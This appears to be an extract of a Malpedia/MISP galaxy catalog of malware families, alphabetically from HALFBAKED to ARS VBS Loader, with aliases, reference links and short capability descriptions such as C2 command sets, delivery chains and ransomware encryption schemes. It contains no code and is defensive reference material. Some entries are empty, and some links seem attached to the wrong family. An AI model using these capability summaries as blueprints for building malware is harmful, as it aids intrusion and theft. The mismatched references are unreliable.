The HALFBAKED malware family consists of multiple components designed to establish and maintain a foothold in victim networks, with the ultimate goal of gaining access to sensitive financial information. HALFBAKED listens for the following commands from the C2 server:
info: Sends victim machine information (OS, Processor, BIOS and running processes) using WMI queries
processList: Send list of process running
screenshot: Takes screen shot of victim machine (using 58d2a83f777688.78384945.ps1)
runvbs: Executes a VB script
runexe: Executes EXE file
runps1: Executes PowerShell script
delete: Delete the specified file
update: Update the specified file

The tag is: misp-galaxy:malpedia="HALFBAKED"

HALFBAKED is also known as:

Table 1278. Table References

<table>
<thead>
<tr>
<th>Links</th>
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<tbody>
<tr>
<td><a href="https://malpedia.caad.fkie.fraunhofer.de/details/vbs.halfbaked">https://malpedia.caad.fkie.fraunhofer.de/details/vbs.halfbaked</a></td>
</tr>
<tr>
<td><a href="https://attack.mitre.org/software/S0151/">https://attack.mitre.org/software/S0151/</a></td>
</tr>
<tr>
<td><a href="https://www.fireeye.com/blog/threat-research/2017/04/fin7-phishing-lnk.html">https://www.fireeye.com/blog/threat-research/2017/04/fin7-phishing-lnk.html</a></td>
</tr>
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</table>

Iloveyou

The tag is: misp-galaxy:malpedia="Iloveyou"

Iloveyou is also known as:

- Love Bug
- LoveLetter

Table 1279. Table References

<table>
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<tr>
<th>Links</th>
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<tbody>
<tr>
<td><a href="https://malpedia.caad.fkie.fraunhofer.de/details/vbs.iloveyou">https://malpedia.caad.fkie.fraunhofer.de/details/vbs.iloveyou</a></td>
</tr>
<tr>
<td><a href="https://resources.sei.cmu.edu/library/asset-view.cfm?assetID=496186">https://resources.sei.cmu.edu/library/asset-view.cfm?assetID=496186</a></td>
</tr>
</tbody>
</table>

lampion

Malware is delivered by emails, containing links to ZIP files or ZIP attachments. The ZIP contains a VBScript that, when executed, downloads additional files from AWS S3, Google Drive or other cloud hosting services. The downloaded files are encrypted .exe and .dll files. The malware targets banking clients in Portugal.
The tag is: misp-galaxy:malpedia="lampion"

lampion is also known as:

Table 1280. Table References

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<th>Links</th>
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<tbody>
<tr>
<td><a href="https://malpedia.caad.fkie.fraunhofer.de/details/vbs.lampion">https://malpedia.caad.fkie.fraunhofer.de/details/vbs.lampion</a></td>
</tr>
<tr>
<td><a href="https://seguranca-informatica.pt/trojan-lampion-is-back-after-3-months/">https://seguranca-informatica.pt/trojan-lampion-is-back-after-3-months/</a></td>
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lockscreen

The tag is: misp-galaxy:malpedia="lockscreen"

lockscreen is also known as:

Table 1281. Table References

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<tr>
<td><a href="https://malpedia.caad.fkie.fraunhofer.de/details/vbs.lockscreen">https://malpedia.caad.fkie.fraunhofer.de/details/vbs.lockscreen</a></td>
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</tbody>
</table>

NodeJS Ransomware

Downloads NodeJS when deployed.

The tag is: misp-galaxy:malpedia="NodeJS Ransomware"

NodeJS Ransomware is also known as:

Table 1282. Table References

<table>
<thead>
<tr>
<th>Links</th>
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<tbody>
<tr>
<td><a href="https://malpedia.caad.fkie.fraunhofer.de/details/vbs.nodejs_ransom">https://malpedia.caad.fkie.fraunhofer.de/details/vbs.nodejs_ransom</a></td>
</tr>
</tbody>
</table>
**Starfighter (VBScript)**

According to the author, this is a JavaScript based Empire launcher that runs with its own embedded powershell host to not be dependent on local powershell availability.

The tag is: `misp-galaxy:malpedia="Starfighter (VBScript)"

Starfighter (VBScript) is also known as:

*Table 1283. Table References*

<table>
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<tr>
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<tbody>
<tr>
<td><a href="https://github.com/Cn33liz/StarFighters">https://github.com/Cn33liz/StarFighters</a></td>
</tr>
</tbody>
</table>

**Unidentified VBS 001**

The tag is: `misp-galaxy:malpedia="Unidentified VBS 001"

Unidentified VBS 001 is also known as:

*Table 1284. Table References*

<table>
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<tr>
<td><a href="https://malpedia.caad.fkie.fraunhofer.de/details/vbs.unidentified_001">https://malpedia.caad.fkie.fraunhofer.de/details/vbs.unidentified_001</a></td>
</tr>
<tr>
<td><a href="https://twitter.com/JohnLaTwC/status/1118278148993339392">https://twitter.com/JohnLaTwC/status/1118278148993339392</a></td>
</tr>
</tbody>
</table>

**Unidentified 002 (Operation Kremlin)**

Unnamed malware. Delivered as remote template that drops a VBS file, which uses LOLBINs to crawl the disk and exfiltrate data zipped up via winrar.

The tag is: `misp-galaxy:malpedia="Unidentified 002 (Operation Kremlin)"

Unidentified 002 (Operation Kremlin) is also known as:

*Table 1285. Table References*

<table>
<thead>
<tr>
<th>Links</th>
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<tbody>
<tr>
<td><a href="https://www.clearskysec.com/operation-kremlin/">https://www.clearskysec.com/operation-kremlin/</a></td>
</tr>
</tbody>
</table>

**Unidentified 003 (Gamaredon Downloader)**

The tag is: `misp-galaxy:malpedia="Unidentified 003 (Gamaredon Downloader)"

Unidentified 003 (Gamaredon Downloader) is also known as:
Table 1286. Table References

<table>
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<tbody>
<tr>
<td><a href="https://malpedia.caad.fkie.fraunhofer.de/details/vbs.unidentified_003">https://malpedia.caad.fkie.fraunhofer.de/details/vbs.unidentified_003</a></td>
</tr>
<tr>
<td><a href="https://aaqeel01.wordpress.com/2021/01/18/docx-files-template-injection/">https://aaqeel01.wordpress.com/2021/01/18/docx-files-template-injection/</a></td>
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</tbody>
</table>

WhiteShadow

The tag is: `misp-galaxy:malpedia="WhiteShadow"`

WhiteShadow is also known as:

Table 1287. Table References

<table>
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<th>Links</th>
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<tbody>
<tr>
<td><a href="https://malpedia.caad.fkie.fraunhofer.de/details/vbs.whiteshadow">https://malpedia.caad.fkie.fraunhofer.de/details/vbs.whiteshadow</a></td>
</tr>
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</table>

404 Keylogger

The tag is: `misp-galaxy:malpedia="404 Keylogger"`

404 Keylogger is also known as:

- 404KeyLogger
- Snake Keylogger

Table 1288. Table References

<table>
<thead>
<tr>
<th>Links</th>
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<tbody>
<tr>
<td><a href="https://malpedia.caad.fkie.fraunhofer.de/details/win.404keylogger">https://malpedia.caad.fkie.fraunhofer.de/details/win.404keylogger</a></td>
</tr>
<tr>
<td><a href="https://habr.com/ru/company/group-ib/blog/477198/">https://habr.com/ru/company/group-ib/blog/477198/</a></td>
</tr>
<tr>
<td><a href="https://insights.infoblox.com/threat-intelligence-reports/threat-intelligence%E2%80%9489">https://insights.infoblox.com/threat-intelligence-reports/threat-intelligence—89</a></td>
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4h_rat

The tag is: `misp-galaxy:malpedia="4h_rat"`

4h_rat is also known as:

Table 1289. Table References

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<tr>
<td><a href="https://malpedia.caad.fkie.fraunhofer.de/details/win.4h_rat">https://malpedia.caad.fkie.fraunhofer.de/details/win.4h_rat</a></td>
</tr>
</tbody>
</table>
7ev3n

The NJCCIC describes 7ev3n as a ransomware "that targets the Windows OS and spreads via spam emails containing malicious attachments, as well as file sharing networks. It installs multiple files in the LocalAppData folder, each of which controls different functions including disabling bootup recovery options, deleting the ransomware installation file, encrypting data, and gaining administrator privileges. This variant also adds registry keys that disables various Windows function keys such as F1, F3, F4, F10, Alt, Num Lock, Ctrl, Enter, Escape, Shift, and Tab. Files encrypted by 7ev3n are labeled with a .R5A extension. It also locks victims out of Windows recovery options making it challenging to repair the damage done by 7ev3n."

The tag is: misp-galaxy:malpedia="7ev3n"

7ev3n is also known as:

Table 1290. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/win.7ev3n
https://blog.malwarebytes.com/threat-analysis/2016/05/7ev3n-ransomware/
https://www.cyber.nj.gov/threat-profiles/ransomware-variants/7ev3n

8.t Dropper

8T_Dropper has been used by Chinese threat actor TA428 in order to install Cotx RAT onto victim’s machines during Operation LagTime IT. According to Proofpoint the attack was developed against a number of government agencies in East Asia overseeing government information technology, domestic affairs, foreign affairs, economic development, and political processes. The dropper was delivered through an RTF document exploiting CVE-2018-0798.

The tag is: misp-galaxy:malpedia="8.t Dropper"

8.t Dropper is also known as:

- 8t_dropper
- RoyalRoad

Table 1291. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/win.8t_dropper
https://medium.com/@Sebdraven/malicious-document-targets-vietnamese-officials-acb3b9d8b80a?
9002 RAT

9002 RAT is a Remote Access Tool typically observed to be used by an APT to control a victim's machine. It has been spread over via zero day exploits (e.g. targeting Internet Explorer) as well as via email attachments. The infection chain starts by opening a .LNK (an OLE packager shell object) that executes a Powershell command.

The tag is: misp-galaxy:malpedia="9002 RAT"

9002 RAT is also known as:

- HOMEUNIX
- Hydraq
- McRAT

Table 1292. Table References

<table>
<thead>
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<tbody>
<tr>
<td><a href="https://malpedia.caad.fkie.fraunhofer.de/details/win.9002">https://malpedia.caad.fkie.fraunhofer.de/details/win.9002</a></td>
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<tr>
<td><a href="https://www.secureworks.com/research/threat-profiles/bronze-keystone">https://www.secureworks.com/research/threat-profiles/bronze-keystone</a></td>
</tr>
</tbody>
</table>
Abaddon

Uses Discord as C&C, has ransomware feature.

The tag is: misp-galaxy:malpedia="Abaddon"

Abaddon is also known as:

Table 1293. Table References

<table>
<thead>
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<tr>
<td><a href="https://malpedia.caad.fkie.fraunhofer.de/details/win.abaddon">https://malpedia.caad.fkie.fraunhofer.de/details/win.abaddon</a></td>
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</table>

AbaddonPOS

The tag is: misp-galaxy:malpedia="AbaddonPOS"

AbaddonPOS is also known as:

- PinkKite
• TinyPOS

Table 1294. Table References

<table>
<thead>
<tr>
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<tbody>
<tr>
<td><a href="https://malpedia.caad.fkie.fraunhofer.de/details/win.abaddon_pos">https://malpedia.caad.fkie.fraunhofer.de/details/win.abaddon_pos</a></td>
</tr>
<tr>
<td><a href="https://medium.com/s2wlab/operation-synctrek-e5013df8d167">https://medium.com/s2wlab/operation-synctrek-e5013df8d167</a></td>
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</tbody>
</table>

abantes

The tag is: misp-galaxy:malpedia="abantes"

abantes is also known as:

Table 1295. Table References

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<tr>
<td><a href="https://malpedia.caad.fkie.fraunhofer.de/details/win.abantes">https://malpedia.caad.fkie.fraunhofer.de/details/win.abantes</a></td>
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</table>

Abbath Banker

The tag is: misp-galaxy:malpedia="Abbath Banker"

Abbath Banker is also known as:

Table 1296. Table References

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<tr>
<td><a href="https://malpedia.caad.fkie.fraunhofer.de/details/win.abbath_banker">https://malpedia.caad.fkie.fraunhofer.de/details/win.abbath_banker</a></td>
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AbSent Loader

The tag is: misp-galaxy:malpedia="AbSent Loader"

AbSent Loader is also known as:

Table 1297. Table References

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<tbody>
<tr>
<td><a href="https://malpedia.caad.fkie.fraunhofer.de/details/win.absent_loader">https://malpedia.caad.fkie.fraunhofer.de/details/win.absent_loader</a></td>
</tr>
</tbody>
</table>
ACBackdoor (Windows)

A Linux backdoor that was apparently ported to Windows. This entry represents the Windows version. It appears the Linux version was written first and the Windows version was ported later, without full functionality. The Linux version offers persistence as well as some process manipulation techniques, though both versions apparently offer the ability to access the command line and execute programs as well as self-update.

The tag is: `misp-galaxy:malpedia="ACBackdoor (Windows)"

ACBackdoor (Windows) is also known as:

Table 1298. Table References

<table>
<thead>
<tr>
<th>Links</th>
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<tbody>
<tr>
<td><a href="https://malpedia.caad.fkie.fraunhofer.de/details/win.acbackdoor">https://malpedia.caad.fkie.fraunhofer.de/details/win.acbackdoor</a></td>
</tr>
</tbody>
</table>

ACEHASH

ACEHASH is described by FireEye as combined credential harvester that consists of two components, a loader and encrypted/compressed payload. To execute, a password is necessary (e.g. 9839D7F1A0) and the individual modules are addressed with parameters (-m, -w, -h).

The tag is: `misp-galaxy:malpedia="ACEHASH"

ACEHASH is also known as:

Table 1299. Table References

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<tr>
<td><a href="https://malpedia.caad.fkie.fraunhofer.de/details/win.acehash">https://malpedia.caad.fkie.fraunhofer.de/details/win.acehash</a></td>
</tr>
<tr>
<td><a href="https://www.welivesecurity.com/2020/05/21/no-game-over-winnti-group/">https://www.welivesecurity.com/2020/05/21/no-game-over-winnti-group/</a></td>
</tr>
<tr>
<td><a href="https://www.secureworks.com/research/threat-profiles/bronze-atlas">https://www.secureworks.com/research/threat-profiles/bronze-atlas</a></td>
</tr>
</tbody>
</table>
AcidBox

Unit42 found AcidBox in February 2019 and describes it as a malware family used by an unknown threat actor in 2017 against Russian entities, as stated by Dr.Web. It reused and improved an exploit for VirtualBox previously used by Turla. The malware itself is a modular toolkit, featuring both usermode and kernelmode components and anti-analysis techniques such as stack-based string obfuscation or dynamic XOR-encoded API usage.

The tag is: `misp-galaxy:malpedia="AcidBox"`

AcidBox is also known as:

- MagicScroll

Table 1300. Table References

<table>
<thead>
<tr>
<th>Links</th>
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<tbody>
<tr>
<td><a href="https://malpedia.caad.fkie.fraunhofer.de/details/win.acidbox">https://malpedia.caad.fkie.fraunhofer.de/details/win.acidbox</a></td>
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<td><a href="https://www.epicturla.com/blog/acidbox-clustering">https://www.epicturla.com/blog/acidbox-clustering</a></td>
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<tr>
<td><a href="https://blog.talosintelligence.com/2020/08/attribution-puzzle.html">https://blog.talosintelligence.com/2020/08/attribution-puzzle.html</a></td>
</tr>
<tr>
<td><a href="https://unit42.paloaltonetworks.com/acidbox-rare-malware/">https://unit42.paloaltonetworks.com/acidbox-rare-malware/</a></td>
</tr>
</tbody>
</table>

AcridRain

AcridRain is a password stealer written in C/C++. This malware can steal credentials, cookies, credit cards from multiple browsers. It can also dump Telegram and Steam sessions, rob Filezilla recent connections, and more.

The tag is: `misp-galaxy:malpedia="AcridRain"`

AcridRain is also known as:

Table 1301. Table References

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<td><a href="https://malpedia.caad.fkie.fraunhofer.de/details/win.acridrain">https://malpedia.caad.fkie.fraunhofer.de/details/win.acridrain</a></td>
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Acronym

The tag is: `misp-galaxy:malpedia="Acronym"`

Acronym is also known as:
Adamantium Thief

The tag is: misp-galaxy:malpedia="Adamantium Thief"

Adamantium Thief is also known as:

Table 1303. Table References

AdamLocker

Adam Locker (detected as RANSOM_ADAMLOCK.A) is a ransomware that encrypts targeted files on a victim’s system but offers them a free decryption key which can be accessed through Adf.ly, a URL shortening and advertising service.

The tag is: misp-galaxy:malpedia="AdamLocker"

AdamLocker is also known as:

Table 1304. Table References

Adhubllka

Some Ransomware distributed by TA547 in Australia

The tag is: misp-galaxy:malpedia="Adhubllka"

Adhubllka is also known as:

Table 1305. Table References
AdKoob

The tag is: `misp-galaxy:malpedia="AdKoob"`

AdKoob is also known as:

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AdvisorsBot

AdvisorsBot is a downloader named after early command and control domains that all contained the word "advisors". The malware is written in C and employs a number of anti-analysis features such as junk code, stack strings and Windows API function hashing.

The tag is: `misp-galaxy:malpedia="AdvisorsBot"`

AdvisorsBot is also known as:

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<td><a href="https://malpedia.caad.fkie.fraunhofer.de/details/win.advisorsbot">https://malpedia.caad.fkie.fraunhofer.de/details/win.advisorsbot</a></td>
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<td><a href="https://www.bromium.com/second-stage-attack-analysis/">https://www.bromium.com/second-stage-attack-analysis/</a></td>
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Adylkuzz

The tag is: `misp-galaxy:malpedia="Adylkuzz"`

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<td><a href="https://malpedia.caad.fkie.fraunhofer.de/details/win.adylkuzz">https://malpedia.caad.fkie.fraunhofer.de/details/win.adylkuzz</a></td>
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Afrodita
The tag is: misp-galaxy:malpedia="Afrodita"

Afrodita is also known as:

Table 1309. Table References

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<td><a href="https://dissectingmalwa.re/not-so-nice-after-all-afrodita-ransomware.html">https://dissectingmalwa.re/not-so-nice-after-all-afrodita-ransomware.html</a></td>
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<td><a href="https://github.com/albertzsigovits/malware-notes/blob/master/Afrodita.md">https://github.com/albertzsigovits/malware-notes/blob/master/Afrodita.md</a></td>
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Agent.BTZ
The tag is: misp-galaxy:malpedia="Agent.BTZ"

Agent.BTZ is also known as:

- ComRAT
- Minit
- Sun rootkit

Table 1310. Table References

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<td><a href="https://www.welivesecurity.com/2020/05/26/agentbtz-comratv4-ten-year-journey/">https://www.welivesecurity.com/2020/05/26/agentbtz-comratv4-ten-year-journey/</a></td>
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</table>
**Agent Tesla**

A .NET based keylogger and RAT readily available to actors. Logs keystrokes and the host's clipboard and beacons this information back to the C2.

The tag is: *misp-galaxy:malpedia=*"Agent Tesla"

Agent Tesla is also known as:

- AgenTesla
- AgentTesla
- Negasteal

*Table 1311. Table References*

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<td><a href="https://thisissecurity.stormshield.com/2018/01/12/agent-tesla-campaign/">https://thisissecurity.stormshield.com/2018/01/12/agent-tesla-campaign/</a></td>
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<td><a href="https://medium.com/@mariohenkel/decrypting-agenttesla-strings-and-config-b9000b18c996?sk=fcead9538516eeb3daa7b53cb537f6f4">https://medium.com/@mariohenkel/decrypting-agenttesla-strings-and-config-b9000b18c996?sk=fcead9538516eeb3daa7b53cb537f6f4</a></td>
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AgfSpy

The agfSpy backdoor retrieves configuration and commands from its C&C server. These commands allow the backdoor to execute shell commands and send the execution results back to the server. It also enumerates directories and can list, upload, download, and execute files, among other functions. The capabilities of agfSpy are very similar to dneSpy, except each backdoor uses a different C&C server and various formats in message exchanges.

The tag is: `misp-galaxy:malpedia=“AgfSpy”`

AgfSpy is also known as:

Table 1312. Table References

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Albaniiutas

The tag is: `misp-galaxy:malpedia=“Albaniiutas”`

Albaniiutas is also known as:

- BlueTraveller

Table 1313. Table References

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</table>
Aldibot

According to Trend Micro Encyclopia: ALDIBOT first appeared in late August 2012 in relevant forums. Variants can steal passwords from the browser Mozilla Firefox, instant messenger client Pidgin, and the download manager jDownloader. ALDIBOT variants send the gathered information to their command-and-control (C&C) servers.

This malware family can also launch Distributed Denial of Service (DDoS) attacks using different protocols such as HTTP, TCP, UDP, and SYN. It can also perform flood attacks via Slowloris and Layer 7.

This bot can also be set up as a SOCKS proxy to abuse the infected machine as a proxy for any protocols.

This malware family can download and execute arbitrary files, and update itself. Variants can steal information, gathering the infected machine's hardware identification (HWID), host name, local IP address, and OS version.

This backdoor executes commands from a remote malicious user, effectively compromising the affected system.

The tag is: misp-galaxy:malpedia="Aldibot"

Aldibot is also known as:

Table 1314. Table References

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Alfonso Stealer

The tag is: misp-galaxy:malpedia="Alfonso Stealer"

Alfonso Stealer is also known as:

Table 1315. Table References

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<td><a href="https://twitter.com/3xp0rtblog/status/1344352253294104576">https://twitter.com/3xp0rtblog/status/1344352253294104576</a></td>
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Project Alice

The tag is: misp-galaxy:malpedia="Project Alice"

Project Alice is also known as:

- AliceATM
- PrAlice

Table 1316. Table References

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<td><a href="https://blog.talosintelligence.com/2019/05/10-years-of-virtual-dynamite.html">https://blog.talosintelligence.com/2019/05/10-years-of-virtual-dynamite.html</a></td>
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Alina POS

The tag is: misp-galaxy:malpedia="Alina POS"

Alina POS is also known as:

- alina_eagle
- alina_spark
- katrina

Table 1317. Table References

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<td><a href="http://www.xylibox.com/2013/02/alina-34-pos-malware.html">http://www.xylibox.com/2013/02/alina-34-pos-malware.html</a></td>
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<td><a href="https://www.trustwave.com/Resources/SpiderLabs-Blog/Alina%E2%80%94Casting-a-Shadow-on-POS/">https://www.trustwave.com/Resources/SpiderLabs-Blog/Alina—Casting-a-Shadow-on-POS/</a></td>
</tr>
</tbody>
</table>
AllaKore

AllaKore is a simple Remote Access Tool written in Delphi, first observed in 2015 but still in early stages of development. It implements the RFB protocol which uses frame buffers and thus is able to send back only the changes of screen frames to the controller, speeding up the transport and visualization control.

The tag is: misp-galaxy:malpedia="AllaKore"

AllaKore is also known as:

Table 1318. Table References

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<td><a href="https://twitter.com/_re_fox/status/1212070711206064131">https://twitter.com/_re_fox/status/1212070711206064131</a></td>
</tr>
<tr>
<td><a href="https://github.com/Anderson-D/AllaKore">https://github.com/Anderson-D/AllaKore</a></td>
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Allaple

The tag is: misp-galaxy:malpedia="Allaple"

Allaple is also known as:

- Starman

Table 1319. Table References

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<td><a href="https://malpedia.caad.fkie.fraunhofer.de/details/win.allaple">https://malpedia.caad.fkie.fraunhofer.de/details/win.allaple</a></td>
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<td><a href="https://researchcenter.paloaltonetworks.com/2014/08/hunting-mutex/">https://researchcenter.paloaltonetworks.com/2014/08/hunting-mutex/</a></td>
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Almanahe

The tag is: misp-galaxy:malpedia="Almanahe"

Almanahe is also known as:

Table 1320. Table References

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### Alma Communicator

The tag is: `misp-galaxy:malpedia="Alma Communicator"`

Alma Communicator is also known as:

Table 1321. Table References

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<td><a href="https://unit42.paloaltonetworks.com/dns-tunneling-in-the-wild-overview-of-oilrigs-dns-tunneling/">https://unit42.paloaltonetworks.com/dns-tunneling-in-the-wild-overview-of-oilrigs-dns-tunneling/</a></td>
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### AlmaLocker

The tag is: `misp-galaxy:malpedia="AlmaLocker"`

AlmaLocker is also known as:

Table 1322. Table References

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### ALPC Local PrivEsc

The tag is: `misp-galaxy:malpedia="ALPC Local PrivEsc"`

ALPC Local PrivEsc is also known as:

Table 1323. Table References

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### Alphabet Ransomware

The tag is: `misp-galaxy:malpedia="Alphabet Ransomware"`

Alphabet Ransomware is also known as:

Table 1324. Table References
AlphaLocker

A new form of ransomware named AlphaLocker that is built by cybercriminals for cybercriminals. Like all incarnations of Ransomware As A Service (RaaS), the AlphaLocker malware program can be purchased and launched by pretty much anyone who wants to get into the ransomware business. What makes AlphaLocker different from other forms of RaaS is its relatively cheap cost. The ransomware can be purchased for just $65 in bitcoin.

AlphaLocker, also known as Alpha Ransomware, is based on the EDA2 ransomware, an educational project open-sourced on GitHub last year by Turkish researcher Utku Sen. A Russian coder seems to have cloned this repository before it was taken down and used it to create his ransomware, a near-perfect clone of EDA2. The ransomware's author, is said to be paying a great deal of attention to updating the ransomware with new features, so it would always stay ahead of antivirus engines, and evade detection.

Alpha Locker's encryption process starts when the ransomware contacts its C&C server. The server generates a public and a private key via the RSA-2048 algorithm, sending the public key to the user's computer and saving the private key to its server. On the infected computer, the ransomware generates an AES-256 key for each file it encrypts, and then encrypts this key with the public RSA key, and sent to the C&C server.

To decrypt their files, users have to get ahold of the private RSA key which can decrypt the AES-encrypted files found on their computers. Users have to pay around 0.35 Bitcoin (~$450) to get this key, packaged within a nice decrypter.

The tag is: *misp-galaxy:malpedia=*"AlphaLocker"

AlphaLocker is also known as:

Table 1325. Table References

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<td><a href="https://malpedia.caad.fkie.fraunhofer.de/details/win.alphalocker">https://malpedia.caad.fkie.fraunhofer.de/details/win.alphalocker</a></td>
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<tr>
<td><a href="https://blog.cylance.com/an-introduction-to-alphalocker">https://blog.cylance.com/an-introduction-to-alphalocker</a></td>
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AlphaNC

The tag is: *misp-galaxy:malpedia=*"AlphaNC"

AlphaNC is also known as:

Table 1326. Table References

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Alreay

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Alreay is also known as:

Table 1327. Table References

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<td><a href="https://securelist.com/blog/sas/77908/lazarus-under-the-hood/">https://securelist.com/blog/sas/77908/lazarus-under-the-hood/</a></td>
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Alureon

The tag is: misp-galaxy:malpedia="Alureon"

Alureon is also known as:

- Olmarik
- Pihar
- TDL
- TDSS
- wowlik

Table 1328. Table References

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<td><a href="http://contagiodump.blogspot.com/2012/02/purple-haze-bootkit.html">http://contagiodump.blogspot.com/2012/02/purple-haze-bootkit.html</a></td>
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<td><a href="http://contagiodump.blogspot.com/2010/02/list-of-aurora-hydraq-roarur-files.html">http://contagiodump.blogspot.com/2010/02/list-of-aurora-hydraq-roarur-files.html</a></td>
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<td><a href="https://www.johannesbader.ch/2016/01/the-dga-in-alureon-dnschanger/">https://www.johannesbader.ch/2016/01/the-dga-in-alureon-dnschanger/</a></td>
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**Amadey**

The tag is: `misp-galaxy:malpedia="Amadey"`

Amadey is also known as:

*Table 1329. Table References*

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<td><a href="https://twitter.com/ViriBack/status/1062405363457118210">https://twitter.com/ViriBack/status/1062405363457118210</a></td>
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<td><a href="https://medium.com/csis-techblog/gcleaner-garbage-provider-since-2019-2708e7c87a8a">https://medium.com/csis-techblog/gcleaner-garbage-provider-since-2019-2708e7c87a8a</a></td>
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<td><a href="https://go.crowdstrike.com/rs/281-OBQ-266/images/Report2021GTR.pdf">https://go.crowdstrike.com/rs/281-OBQ-266/images/Report2021GTR.pdf</a></td>
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**AMTsol**

The tag is: `misp-galaxy:malpedia="AMTsol"`

AMTsol is also known as:

- Adupihan

*Table 1330. Table References*

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<td><a href="https://blogs.technet.microsoft.com/mmpc/2017/06/07/platinum-continues-to-evolve-find-ways-to-maintain-invisibility/">https://blogs.technet.microsoft.com/mmpc/2017/06/07/platinum-continues-to-evolve-find-ways-to-maintain-invisibility/</a></td>
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</tbody>
</table>
Anatova Ransomware

Anatova is a ransomware family with the goal of ciphering all the files that it can and then requesting payment from the victim. It will also check if network shares are connected and will encrypt the files on these shares too. The code is also prepared to support modular extensions.

The tag is: `misp-galaxy:malpedia="Anatova Ransomware"

Anatova Ransomware is also known as:

Table 1331. Table References

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<td><a href="https://malpedia.caad.fkie.fraunhofer.de/details/win.anatova_ransom">https://malpedia.caad.fkie.fraunhofer.de/details/win.anatova_ransom</a></td>
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Anchor

Anchor is a sophisticated backdoor served as a module to a subset of TrickBot installations. Operating since August 2018 it is not delivered to everybody, but contrary is delivered only to high-profile targets. Since its C2 communication scheme is very similar to the one implemented in the early TrickBot, multiple experts believe it could be attributed to the same authors.

The tag is: `misp-galaxy:malpedia="Anchor"

Anchor is also known as:

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<td><a href="https://www.netscout.com/blog/asser/dropping-anchor">https://www.netscout.com/blog/asser/dropping-anchor</a></td>
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<td><a href="https://technical.nttsecurity.com/post/102fsp2/trickbot-variant-anchor-dns-communicating-over-dns">https://technical.nttsecurity.com/post/102fsp2/trickbot-variant-anchor-dns-communicating-over-dns</a></td>
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<td><a href="https://unit42.paloaltonetworks.com/ryuk-ransomware/">https://unit42.paloaltonetworks.com/ryuk-ransomware/</a></td>
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<td><a href="https://hello.global.ntt/zh-cn/insights/blog/trickbot-variant-communicating-over-dns">https://hello.global.ntt/zh-cn/insights/blog/trickbot-variant-communicating-over-dns</a></td>
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<td><a href="https://labs.sentinelone.com/the-deadly-planeswalker-how-the-trickbot-group-united-high-tech-crimeware-apt/">https://labs.sentinelone.com/the-deadly-planeswalker-how-the-trickbot-group-united-high-tech-crimeware-apt/</a></td>
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Andromeda

The tag is: misp-galaxy:malpedia="Andromeda"

Andromeda is also known as:

- B106-Gamarue
- B67-SS-Gamarue
- Gamarue
- b66

Table 1333. Table References

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<td><a href="https://blog.avast.com/andromeda-under-the-microscope">https://blog.avast.com/andromeda-under-the-microscope</a></td>
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<td><a href="https://eternal-todo.com/blog/yet-another-andromeda-gamarue-analysis">https://eternal-todo.com/blog/yet-another-andromeda-gamarue-analysis</a></td>
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<td><a href="http://resources.infosecinstitute.com/andromeda-bot-analysis/">http://resources.infosecinstitute.com/andromeda-bot-analysis/</a></td>
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<td><a href="http://www.0xebfe.net/blog/2013/03/30/fooled-by-andromeda/">http://www.0xebfe.net/blog/2013/03/30/fooled-by-andromeda/</a></td>
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<td><a href="https://www.virusbulletin.com/virusbulletin/2013/08/andromeda-2-7-features">https://www.virusbulletin.com/virusbulletin/2013/08/andromeda-2-7-features</a></td>
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<td><a href="https://www.virusbulletin.com/virusbulletin/2018/02/review-evolution-andromeda-over-years-we-say-goodbye/">https://www.virusbulletin.com/virusbulletin/2018/02/review-evolution-andromeda-over-years-we-say-goodbye/</a></td>
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AndroMut

The tag is: misp-galaxy:malpedia="AndroMut"

AndroMut is also known as:

- Gelup

Table 1334. Table References

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<td><a href="https://blog.intel471.com/2020/05/21/a-brief-history-of-ta505/">https://blog.intel471.com/2020/05/21/a-brief-history-of-ta505/</a></td>
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Anel

The tag is: misp-galaxy:malpedia="Anel"

Anel is also known as:

- UPPERCUT
- lena

Table 1335. Table References
AnteFrigus Ransomware

The tag is: `misp-galaxy:malpedia="AnteFrigus Ransomware"`

AnteFrigus Ransomware is also known as:

Table 1336. Table References

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<td><a href="https://www.secureworks.com/research/threat-profiles/bronze-riverside">https://www.secureworks.com/research/threat-profiles/bronze-riverside</a></td>
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Antilam

The tag is: `misp-galaxy:malpedia="Antilam"`

Antilam is also known as:

- Latinus

Table 1337. Table References

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<td><a href="https://github.com/albertszigovits/malware-notes/blob/master/Antefrigus.md">https://github.com/albertszigovits/malware-notes/blob/master/Antefrigus.md</a></td>
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Anubis (Windows)

According to Microsoft Security Intelligence, Anubis is an information stealer sold on underground forums since June 2020. The name overlaps with the Android banking malware but is unrelated. It contains code forked from Loki PWS.

The tag is: `misp-galaxy:malpedia="Anubis (Windows)"

Anubis (Windows) is also known as:
- Anubis Stealer

**Table 1338. Table References**

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<td><a href="https://malpedia.caad.fkie.fraunhofer.de/details/win.anubis">https://malpedia.caad.fkie.fraunhofer.de/details/win.anubis</a></td>
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**Apocalipto**

The tag is: `misp-galaxy:malpedia="Apocalipto"`

Apocalipto is also known as:

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**Apocalypse**

The tag is: `misp-galaxy:malpedia="Apocalypse"`

Apocalypse is also known as:

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<td><a href="http://blog.emsisoft.com/2016/06/29/apocalypse-ransomware-which-targets-companies-through-insecure-rdp/">http://blog.emsisoft.com/2016/06/29/apocalypse-ransomware-which-targets-companies-through-insecure-rdp/</a></td>
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**AppleJeus (Windows)**

The tag is: `misp-galaxy:malpedia="AppleJeus (Windows)"

AppleJeus (Windows) is also known as:

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Appleseed

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Appleseed is also known as:

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ArdaMax

The tag is: misp-galaxy:malpedia="ArdaMax"

ArdaMax is also known as:

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Arefty

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Arefty is also known as:

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Aria-body

The tag is: misp-galaxy:malpedia="Aria-body"

Aria-body is also known as:

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Arik Keylogger

The tag is: misp-galaxy:malpedia="Arik Keylogger"

Arik Keylogger is also known as:

• Aaron Keylogger

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Arkei Stealer

The tag is: misp-galaxy:malpedia="Arkei Stealer"

Arkei Stealer is also known as:

• ArkeiStealer

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ARS VBS Loader

ARS Loader, also known as ARS VBS Loader, is written in Visual Basic Script and its main purpose is to control an infected machine via different available commands, acting as a remote access trojan (RAT). Its code is based on ASPC, another Visual Basic Script malware, which at the same time seems to be based on SafeLoader.

The tag is: misp-galaxy:malpedia="ARS VBS Loader"

ARS VBS Loader is also known as:

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<td><a href="https://www.flashpoint-intel.com/blog/meet-ars-vbs-loader/">https://www.flashpoint-intel.com/blog/meet-ars-vbs-loader/</a></td>
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<td><a href="https://twitter.com/Racco42/status/1001374490339790849">https://twitter.com/Racco42/status/1001374490339790849</a></td>
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ARTFULPIE

